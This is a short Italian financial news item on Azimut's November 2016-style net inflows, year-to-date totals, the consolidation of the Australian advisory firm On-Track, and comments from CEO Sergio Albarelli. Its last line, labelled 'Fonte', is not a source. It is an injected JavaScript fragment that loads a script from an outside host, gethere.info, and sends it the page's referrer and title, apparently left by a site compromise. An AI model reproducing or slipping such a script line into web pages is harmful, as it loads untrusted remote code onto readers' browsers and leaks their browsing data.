Azimut ha messo a segno in novembre una raccolta netta positiva per 197 milioni di euro, portando il risultato da inizio anno a circa 5,8 miliardi. Il dato ha beneficiato del consolidamento di On-Track, l’ultima società di consulenza finanziaria australiana entrata a far parte di Az Nga. Al netto del consolidamento delle masse di quest’ultima, il gruppo ha conseguito una raccolta positiva per circa 80 milioni. Il totale delle masse comprensive del risparmio amministrato è ammontato a fine novembre a 42,3 miliardi di euro, di cui 34,6 mld in riferimento alle masse gestite.

«In un mese in cui abbiamo assistito a un certo nervosismo sui mercati finanziari dovuto ai diversi appuntamenti elettorali», ha commentato l’amministratore delegato di Azimut, Sergio Albarelli. «Siamo molto soddisfatti di come il gruppo ha reagito, sia sul lato gestione sia sul lato distribuzione, assistendo efficacemente i clienti, che da inizio anno hanno beneficiato di una performance media ponderata netta vicina al 2%, più alta dell’indice di settore».

© Riproduzione riservata
Fonte: s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;